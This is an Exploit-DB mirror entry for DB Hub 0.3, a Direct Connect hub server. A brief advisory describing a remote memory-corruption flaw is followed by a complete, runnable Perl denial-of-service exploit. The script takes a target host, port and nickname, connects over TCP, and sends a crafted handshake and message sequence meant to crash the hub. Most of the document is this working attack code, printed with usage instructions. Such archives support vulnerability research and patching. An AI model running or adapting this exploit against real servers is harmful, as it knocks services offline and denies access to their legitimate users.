exploit-db-mirror/exploits/multiple/dos/29362.pl
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

45 lines
No EOL
1.5 KiB
Perl
Executable file

source: http://www.securityfocus.com/bid/21791/info
A remote denial-of-service vulnerability affects the DB Hub application because of a memory-corruption flaw when the application attempts to process specially crafted network traffic.
An attacker may exploit this issue to crash affected applications, denying service to legitimate users.
DB Hub version 0.3 is vulnerable to this issue; other versions may also be affected.
#!/usr/bin/perl
# DB Hub (http://dbhub.ir.pl/) DoS exploit
# Critical Security (http://www.critical.lt)
use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $nick = $ARGV[2];
print q(
----------------------------------------------
| DB Hub (http://dbhub.ir.pl/) DoS exploit |
----------------------------------------------
);
if (@ARGV < 3) {
print "Usage: perl crit_dbhub.pl host port nick\n";
exit();
}
if ($connect = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => tcp,
Timeout => 5 )
or die "[-] Can't connect\n")
{
print "[+] Connected!\n";
}
$res = $connect->recv($text,200);
if ($text = ~/Lock/) { $connect->send("\$Key vistiek_netikrina|\$ValidateNick $nick|"); }
$connect->send("\$Version 20|\$MyINFO \$ALL $nick <++ V:0.674,M:A,H:1/0/0,S:11>\$ \$DSL.\$\$19313847685\$|\$GetNickList|");
$connect->send("<$nick>!|"); # xixi
print "[+] Data sent\n";
while($text) { $res = $connect->recv($text,200); }
print "[+] Done\n";